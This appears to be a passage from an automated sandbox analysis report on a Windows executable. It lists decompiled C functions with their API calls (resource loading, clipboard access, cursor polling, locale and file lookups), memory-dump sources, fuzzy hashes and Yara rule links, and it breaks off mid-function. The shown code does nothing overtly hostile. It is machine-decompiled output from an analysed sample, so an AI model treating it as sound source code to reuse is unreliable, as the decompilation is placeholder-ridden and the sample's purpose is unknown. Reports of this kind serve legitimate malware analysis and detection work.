                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: KeyboardMessageSendState
                                                                        • String ID:
                                                                        • API String ID: 1999190242-0
                                                                        • Opcode ID: fad6d155a161e0a0ec6beaff0b0cd5eee778928cfc5a025ab2d6d9f425fb3a4f
                                                                        • Instruction ID: 0a00c29b07d859761f66e24d50c690cbb1c1765d6d02b1fe706050cb4a926a74
                                                                        • Opcode Fuzzy Hash: fad6d155a161e0a0ec6beaff0b0cd5eee778928cfc5a025ab2d6d9f425fb3a4f
                                                                        • Instruction Fuzzy Hash: 07614D74A00618EFDB10EF69C985ADDB7B4EB59304F2045EAE804A7392D7386F84DB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00417214, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E00417214(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E004171A4(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x416fb4
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E004171A4(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x416fb4
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x416ad4
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E00416F74(_t23, _t25, _t18);
			}

















                                                                        0x0041721b
                                                                        0x0041721e
                                                                        0x00417220
                                                                        0x00417230
                                                                        0x00417232
                                                                        0x00417235
                                                                        0x00417237
                                                                        0x0041723a
                                                                        0x0041723f
                                                                        0x0041723f
                                                                        0x00417240
                                                                        0x0041724a
                                                                        0x0041724c
                                                                        0x0041724f
                                                                        0x00417251
                                                                        0x00417254
                                                                        0x00417259
                                                                        0x0041725a
                                                                        0x00417264
                                                                        0x00417265
                                                                        0x00417269
                                                                        0x00417272
                                                                        0x0041727d

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,?,?), ref: 0041722B
                                                                        • LoadResource.KERNEL32(?,00416FB4,?,?,?,004123F4,?,00000001,00000000,?,00417184,?), ref: 00417245
                                                                        • SizeofResource.KERNEL32(?,00416FB4,?,00416FB4,?,?,?,004123F4,?,00000001,00000000,?,00417184,?), ref: 0041725F
                                                                        • LockResource.KERNEL32(00416AD4,00000000,?,00416FB4,?,00416FB4,?,?,?,004123F4,?,00000001,00000000,?,00417184,?), ref: 00417269
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                        • String ID:
                                                                        • API String ID: 3473537107-0
                                                                        • Opcode ID: 005317863e8cff03af0266735c1d7592115360119c5bcdfeb6093ed02da14767
                                                                        • Instruction ID: 3290e5c036addd08ea02881163b77e979cd31cb4f03c08ba38f160ae1e3d6bef
                                                                        • Opcode Fuzzy Hash: 005317863e8cff03af0266735c1d7592115360119c5bcdfeb6093ed02da14767
                                                                        • Instruction Fuzzy Hash: F9F04BB26052046F9704EE5EA881D9B77ECEE89364311416AF909D7202DA39ED518768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00430D08, Relevance: 6.0, APIs: 4, Instructions: 46sleepCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E00430D08(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x430d85);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E00430754(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E004303AC(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E004047F8(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x430d8c);
				return E00404348( &_v8);
			}









                                                                        0x00430d0b
                                                                        0x00430d0f
                                                                        0x00430d13
                                                                        0x00430d14
                                                                        0x00430d19
                                                                        0x00430d1c
                                                                        0x00430d21
                                                                        0x00430d2b
                                                                        0x00430d2d
                                                                        0x00430d2f
                                                                        0x00430d3b
                                                                        0x00430d49
                                                                        0x00430d52
                                                                        0x00430d5b
                                                                        0x00430d6a
                                                                        0x00430d6a
                                                                        0x00430d71
                                                                        0x00430d74
                                                                        0x00430d77
                                                                        0x00430d84

                                                                        APIs
                                                                          • Part of subcall function 00430754: WinHelpA.USER32 ref: 00430763
                                                                        • GetTickCount.KERNEL32 ref: 00430D26
                                                                        • Sleep.KERNEL32(00000000,00000000,00430D85,?,?,00000000,00000000,?,00430CFB), ref: 00430D2F
                                                                        • GetTickCount.KERNEL32 ref: 00430D34
                                                                        • WinHelpA.USER32 ref: 00430D6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CountHelpTick$Sleep
                                                                        • String ID:
                                                                        • API String ID: 2438605093-0
                                                                        • Opcode ID: b159ed8da29f14084cdfe4b7c42b37775e2f4efdee277ec71451ef76ad6eb451
                                                                        • Instruction ID: 728367182c2a4c0d1575522e4c38db70398e5defa9278ae5990baf4831071f11
                                                                        • Opcode Fuzzy Hash: b159ed8da29f14084cdfe4b7c42b37775e2f4efdee277ec71451ef76ad6eb451
                                                                        • Instruction Fuzzy Hash: D701A270700204AFE711FBA6CC52B5DB2E8DB4C704F52567BF500A75C1DA79AE009969
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043A6DC, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E0043A6DC(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				void* __edi;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr* _t68;
				void* _t69;

				_t68 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t69 = _t17 - 0x84;
				if(_t69 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E00436D1C(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						return E0043782C(_t50, _t68);
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E0043A648(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t68 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E0043CF30(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t68 + 8)));
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_t32 = E0043CC2C(_t50);
						_push(_t32);
						L00406D8C();
						return _t32;
					}
					goto L27;
				}
				if(_t69 == 0) {
					_t21 = E0043782C(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E00407314( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E004360F0(_t50,  &_v28,  &_v20);
					_t21 = E0043A5B4(_t50, 0,  &_v28, _t65, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t68 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t66 = E0044DA34(__eax);
					if(_t66 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t66 + 0xe4))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E0043CC2C(__eax);
						if(_t45 == GetCapture() &&  *0x47a96c != 0) {
							_t47 =  *0x47a96c; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x47a96c; // 0x0
								E00437760(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}




















                                                                        0x0043a6e2
                                                                        0x0043a6e4
                                                                        0x0043a6e6
                                                                        0x0043a6e8
                                                                        0x0043a6ed
                                                                        0x0043a70c
                                                                        0x0043a70f
                                                                        0x0043a7ec
                                                                        0x0043a7f3
                                                                        0x0043a83e
                                                                        0x0043a83e
                                                                        0x0043a83e
                                                                        0x0043a82f
                                                                        0x00000000
                                                                        0x0043a833
                                                                        0x0043a71d
                                                                        0x0043a7b6
                                                                        0x0043a7bd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043a7c3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043a7c7
                                                                        0x0043a7ce
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043a7d3
                                                                        0x0043a7d7
                                                                        0x0043a7da
                                                                        0x0043a7dd
                                                                        0x0043a7e2
                                                                        0x0043a7e3
                                                                        0x00000000
                                                                        0x0043a7e3
                                                                        0x00000000
                                                                        0x0043a723
                                                                        0x0043a6ef
                                                                        0x0043a765
                                                                        0x0043a76e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043a77d
                                                                        0x0043a78c
                                                                        0x0043a799
                                                                        0x0043a7a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043a7a6
                                                                        0x00000000
                                                                        0x0043a7a6
                                                                        0x0043a6f1
                                                                        0x0043a6f4
                                                                        0x0043a72f
                                                                        0x0043a733
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043a73f
                                                                        0x0043a747
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043a74d
                                                                        0x0043a6f6
                                                                        0x0043a6f7
                                                                        0x0043a756
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043a6f9
                                                                        0x0043a6fc
                                                                        0x0043a7f9
                                                                        0x0043a807
                                                                        0x0043a812
                                                                        0x0043a81a
                                                                        0x0043a825
                                                                        0x0043a82a
                                                                        0x0043a82a
                                                                        0x0043a81a
                                                                        0x0043a807
                                                                        0x0043a6fc

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Capture
                                                                        • String ID:
                                                                        • API String ID: 1145282425-3916222277
                                                                        • Opcode ID: c6b065f950aeea42138e2c2433ce8e98d842ebbd617e3b1284dea8e207de2a66
                                                                        • Instruction ID: 12ac0fe7456563294c718b5602fa9538c711e14ac05094fc64cad230b781499c
                                                                        • Opcode Fuzzy Hash: c6b065f950aeea42138e2c2433ce8e98d842ebbd617e3b1284dea8e207de2a66
                                                                        • Instruction Fuzzy Hash: C5318E707402005BC728BA39898566A22959B4D318F14B93FB4D6D7396DA3CCC66C78B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004233B4, Relevance: 4.6, APIs: 3, Instructions: 51fileclipboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004233B4(intOrPtr* __eax, void* __ecx, void* __edx) {
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct tagENHMETAHEADER _v104;
				void* __ebp;
				intOrPtr _t35;
				intOrPtr* _t37;
				struct HENHMETAFILE__* _t43;
				intOrPtr _t44;

				_t37 = __eax;
				_t43 = GetClipboardData(0xe);
				if(_t43 == 0) {
					_t35 =  *0x495ae0; // 0x41d524
					E004209F0(_t35);
				}
				E00422B88(_t37);
				_t44 =  *((intOrPtr*)(_t37 + 0x28));
				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
				 *((short*)(_t44 + 0x18)) = 0;
				 *((char*)(_t37 + 0x2c)) = 1;
				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
				return  *((intOrPtr*)( *_t37 + 0x10))();
			}












                                                                        0x004233bd
                                                                        0x004233c6
                                                                        0x004233ca
                                                                        0x004233cc
                                                                        0x004233d1
                                                                        0x004233d1
                                                                        0x004233d8
                                                                        0x004233dd
                                                                        0x004233e8
                                                                        0x004233f5
                                                                        0x00423400
                                                                        0x00423409
                                                                        0x0042340c
                                                                        0x00423412
                                                                        0x00423422
                                                                        0x00423434

                                                                        APIs
                                                                        • GetClipboardData.USER32 ref: 004233C1
                                                                        • CopyEnhMetaFileA.GDI32(00000000,00000000,0000000E), ref: 004233E3
                                                                        • GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000,0000000E), ref: 004233F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileMeta$ClipboardCopyDataHeader
                                                                        • String ID:
                                                                        • API String ID: 1752724394-0
                                                                        • Opcode ID: 584a0899f4454c9ff22cde47aa0bf1c7314bbfefc93f0f0ebb0ed237522287c3
                                                                        • Instruction ID: 046aa751e527933c7b20a5c02d24ec073801e8f6abf4c557e599ba6369277cb7
                                                                        • Opcode Fuzzy Hash: 584a0899f4454c9ff22cde47aa0bf1c7314bbfefc93f0f0ebb0ed237522287c3
                                                                        • Instruction Fuzzy Hash: 4E117C717003048FC710DF6AC885A9ABBF8AF49310F51467AE909DB252DB75EC058B98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00454E54, Relevance: 4.5, APIs: 3, Instructions: 33synchronizationthreadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00454E54() {
				struct tagPOINT _v12;
				void* _t5;
				long _t6;

				 *0x496c14 = GetCurrentThreadId();
				L5:
				_t5 =  *0x496c18; // 0x0
				_t6 = WaitForSingleObject(_t5, 0x64);
				if(_t6 == 0x102) {
					if( *0x496c04 != 0 &&  *((intOrPtr*)( *0x496c04 + 0x60)) != 0) {
						GetCursorPos( &_v12);
						if(E00434E24( &_v12) == 0) {
							E004571F4( *0x496c04);
						}
					}
					goto L5;
				}
				return _t6;
			}






                                                                        0x00454e65
                                                                        0x00454e95
                                                                        0x00454e97
                                                                        0x00454e9d
                                                                        0x00454ea7
                                                                        0x00454e6f
                                                                        0x00454e7d
                                                                        0x00454e8c
                                                                        0x00454e90
                                                                        0x00454e90
                                                                        0x00454e8c
                                                                        0x00000000
                                                                        0x00454e6f
                                                                        0x00454ead

                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00454E60
                                                                        • GetCursorPos.USER32(?), ref: 00454E7D
                                                                        • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00454E9D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CurrentCursorObjectSingleThreadWait
                                                                        • String ID:
                                                                        • API String ID: 1359611202-0
                                                                        • Opcode ID: 2181e533a6cec7c1c80d86737d6f4b9c07e79e28550219c8533fb89150b3b8bd
                                                                        • Instruction ID: d492c6761d47016650798b2a4f2e7253e3df892c5a842f98240a92612d232fcb
                                                                        • Opcode Fuzzy Hash: 2181e533a6cec7c1c80d86737d6f4b9c07e79e28550219c8533fb89150b3b8bd
                                                                        • Instruction Fuzzy Hash: 1EF0B4321042059ADF20E799D887B5633E8FB44309F010077E9009E2D2DB7D98C5C71D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043BDB0, Relevance: 3.1, APIs: 2, Instructions: 63windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0043BDB0(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* _t25;
				intOrPtr* _t31;
				void* _t34;
				intOrPtr* _t37;
				void* _t45;

				_v8 = __edx;
				_t37 = __eax;
				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
					L8:
					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
						L10:
						return  *((intOrPtr*)( *_t37 - 0x10))();
					}
					_t25 = E0043BD00(_t37, _t45);
					if(_t25 == 0) {
						goto L10;
					}
				} else {
					_t31 =  *0x495ad0; // 0x496c04
					if(_t37 ==  *((intOrPtr*)( *_t31 + 0x44))) {
						goto L8;
					} else {
						_t34 = E0044DA34(_t37);
						_t44 = _t34;
						if(_t34 == 0) {
							goto L8;
						} else {
							_t25 = E00437760(_t44, 0, 0xb017, _v8);
							if(_t25 == 0) {
								goto L8;
							}
						}
					}
				}
				return _t25;
			}










                                                                        0x0043bdb6
                                                                        0x0043bdb9
                                                                        0x0043bdcb
                                                                        0x0043be29
                                                                        0x0043be39
                                                                        0x0043be48
                                                                        0x00000000
                                                                        0x0043be4f
                                                                        0x0043be3e
                                                                        0x0043be46
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043bdfa
                                                                        0x0043bdfa
                                                                        0x0043be04
                                                                        0x00000000
                                                                        0x0043be06
                                                                        0x0043be08
                                                                        0x0043be0d
                                                                        0x0043be11
                                                                        0x00000000
                                                                        0x0043be13
                                                                        0x0043be20
                                                                        0x0043be27
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043be27
                                                                        0x0043be11
                                                                        0x0043be04
                                                                        0x0043be56

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CaptureIconic
                                                                        • String ID:
                                                                        • API String ID: 2277910766-0
                                                                        • Opcode ID: 87fd33f331bf0354e6fdcf0377d194eb44efd1ead2dc2f90263fdd11b2e56acc
                                                                        • Instruction ID: 3b1b24bba76df9106612dd079887cf6aa0e728384a99efc309afd5cd92888748
                                                                        • Opcode Fuzzy Hash: 87fd33f331bf0354e6fdcf0377d194eb44efd1ead2dc2f90263fdd11b2e56acc
                                                                        • Instruction Fuzzy Hash: BC110035B00205DBDB24EB9DE586AAA73E4EF08304F2460B7E604DF352D778ED409798
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00420A80, Relevance: 3.0, APIs: 2, Instructions: 46windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E00420A80(void* __ebx) {
				char _v260;
				char _v264;
				long _t21;
				void* _t22;
				intOrPtr _t27;
				void* _t32;

				_v264 = 0;
				_push(_t32);
				_push(0x420b1c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32 + 0xfffffefc;
				_t21 = GetLastError();
				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
					E00420A2C(_t22);
				} else {
					E004045B0( &_v264, 0x100,  &_v260);
					E0040A17C(_v264, 1);
					E00403DA8();
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(E00420B23);
				return E00404348( &_v264);
			}









                                                                        0x00420a8c
                                                                        0x00420a94
                                                                        0x00420a95
                                                                        0x00420a9a
                                                                        0x00420a9d
                                                                        0x00420aa5
                                                                        0x00420aa9
                                                                        0x00420afe
                                                                        0x00420acf
                                                                        0x00420ae0
                                                                        0x00420af2
                                                                        0x00420af7
                                                                        0x00420af7
                                                                        0x00420b05
                                                                        0x00420b08
                                                                        0x00420b0b
                                                                        0x00420b1b

                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,00420B1C,?,00000000,?,00420B34,00000000,0042411B,00000000,00000000,004242BB,?,00000000,?,?), ref: 00420AA0
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00420B1C,?,00000000,?,00420B34,00000000,0042411B,00000000), ref: 00420AC6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ErrorFormatLastMessage
                                                                        • String ID:
                                                                        • API String ID: 3479602957-0
                                                                        • Opcode ID: 6838e39e97c1f34c2ece11ce19f9ae0e55e91045b487aa8bd30817d389b3f453
                                                                        • Instruction ID: a7e0326648665491cf35c585204d71cbec4fadd530319c3be2108fcfe5b4c816
                                                                        • Opcode Fuzzy Hash: 6838e39e97c1f34c2ece11ce19f9ae0e55e91045b487aa8bd30817d389b3f453
                                                                        • Instruction Fuzzy Hash: E101D4703443185FE721EB619C92BE677EC9B58708F9100BAB644A62C2DEF86D808959
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040AD50, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 46%
                                                                        			E0040AD50(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40adb4);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E004045B0( &_v16, 7,  &_v11);
				_push(_v16);
				E004087C0(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040ADBB);
				return E00404348( &_v16);
			}








                                                                        0x0040ad50
                                                                        0x0040ad59
                                                                        0x0040ad5e
                                                                        0x0040ad5f
                                                                        0x0040ad64
                                                                        0x0040ad67
                                                                        0x0040ad76
                                                                        0x0040ad86
                                                                        0x0040ad8e
                                                                        0x0040ad97
                                                                        0x0040ada0
                                                                        0x0040ada3
                                                                        0x0040ada6
                                                                        0x0040adb3

                                                                        APIs
                                                                        • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040ADB4), ref: 0040AD76
                                                                        • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040ADB4), ref: 0040AD8F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: 01b31bc8a1b5dac8776ab9d8f92ab82c230197195aca289df6b40fc05eb71f23
                                                                        • Instruction ID: f7aee971aabc4a8eaaa558cbc6123ec81126d331191583c2179f3b6fc9b9f086
                                                                        • Opcode Fuzzy Hash: 01b31bc8a1b5dac8776ab9d8f92ab82c230197195aca289df6b40fc05eb71f23
                                                                        • Instruction Fuzzy Hash: 2AF0F675E04308BFE700EBE2CC4299EB3ABDBC4718F50C47AB610A3AC0EA7C65148658
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004089B8, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004089B8(void* __eax, WORD* __ecx, signed int __edx) {
				WORD* _t15;
				void* _t21;
				long _t22;

				_t15 = __ecx;
				 *(__ecx + 0x10) =  !__edx & 0x0000001e;
				_t21 = FindFirstFileA(E004047F8(__eax), __ecx + 0x18);
				 *((intOrPtr*)(_t15 + 0x14)) = _t21;
				if(_t21 == 0xffffffff) {
					_t22 = GetLastError();
				} else {
					_t22 = E00408954(_t15);
					if(_t22 != 0) {
						E00408A2C(_t15);
					}
				}
				return _t22;
			}






                                                                        0x004089bb
                                                                        0x004089c4
                                                                        0x004089d8
